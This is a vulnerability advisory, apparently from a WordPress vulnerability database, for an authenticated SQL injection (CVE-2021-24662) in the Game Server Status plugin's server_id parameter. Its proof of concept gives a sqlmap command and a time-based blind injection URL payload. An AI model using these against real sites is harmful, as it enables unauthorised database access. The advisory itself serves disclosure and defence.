WordPress Plugin Vulnerabilities

Game Server Status <= 1.0 - Admin+ SQL Injection

Description

The plugin does not validate or escape the server_id parameter before using it in SQL statement, leading to an Authenticated SQL Injection in an admin page

Proof of Concept

sqlmap -u "https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1" -p server_id --dbms mysql --cookie [your cookie]

https://example.com/wp-admin/admin.php?page=grohsfabian-add-game-servers&server_id=1+OR+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)

Affects Plugins

Plugin icon
game-server-status
No known fix

References

CVE
CVE-2021-24662

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Neppah
Submitter
Neppah
Verified
Yes
WPVDB ID
8a74a2a0-3d8c-427f-9a83-0160d652c5f0

Timeline

Publicly Published
2021-09-21 (about 2 years ago)
Added
2021-09-21 (about 2 years ago)
Last Updated
2022-04-10 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
GD Star Rating 1.9.22 - SQL Injection
Published
2022-01-06
Title
WordPress < 5.8.3 - SQL Injection via WP_Query
Published
2014-08-01
Title
ForumConverter - SQL Injection
Published
2021-06-04
Title
GeoDirectory Location Manager < 2.1.0.10 - Multiple Unauthenticated SQL Injections
Published
2021-05-27
Title
Side Menu < 3.1.5 - Authenticated (admin+) SQL Injection